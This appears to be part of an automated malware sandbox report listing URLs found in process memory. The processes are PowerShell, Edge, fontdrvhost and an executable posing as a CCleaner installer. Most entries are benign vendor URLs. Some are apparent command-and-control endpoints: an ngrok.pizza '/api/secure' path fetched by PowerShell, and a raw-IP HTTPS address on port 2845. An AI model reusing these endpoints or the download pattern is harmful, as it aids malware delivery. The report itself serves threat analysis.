                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                    Source: svchost.exe, 0000000C.00000003.2321523303.0000014A52850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E14594B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000003.00000002.2465180795.000002E155020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ocsp.thawte.com0
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1451D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeString found in binary or memory: http://piriform.com/go/app_cc_license_agreement
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.00000000045B1000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://piriform.com/go/app_cc_license_agreementPA
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.00000000045B1000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://piriform.com/go/app_cc_privacy_policy
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://s2.symcb.com0
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E144FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A3BA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0f
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://sv.symcd.com0&
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1451D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                    Source: powershell.exe, 00000003.00000002.2474347673.000002E15D460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.00000000045B1000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                    Source: fontdrvhost.exeString found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop
                    Source: fontdrvhost.exe, 00000022.00000002.2878945473.00000000030BC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfopx
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.n
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1451D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A5057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                    Source: powershell.exe, 00000003.00000002.2433719977.000002E142F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e
                    Source: powershell.exe, 00000003.00000002.2470223495.000002E15CFB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2435573515.000002E1431C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2433719977.000002E142F59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2476775542.000002E15D517000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2435817848.000002E143200000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2433719977.000002E142F62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e-UseBasicPars
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A50CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6eX
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E144FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A3BBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A3BA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E146BE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E146F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1460F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E146F4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E146F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                    Source: msedge.exe, 0000000A.00000002.2421063613.000002A699CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com0y
                    Source: msedge.exe, 0000001C.00000002.2494389783.00000240434D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comb7
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                    Source: msedge.exe, 0000000A.00000002.2425663714.00002CFC0000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2498672218.0000533000188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                    Source: msedge.exe, 0000001C.00000002.2498672218.0000533000188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreS0
                    Source: msedge.exe, 0000000A.00000002.2425663714.00002CFC0000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2498672218.0000533000188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                    Source: msedge.exe, 0000000A.00000002.2425798315.00002CFC00040000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2497740550.000053300002C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                    Source: powershell.exe, 00000003.00000002.2465180795.000002E155020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.2465180795.000002E155020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.2465180795.000002E155020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
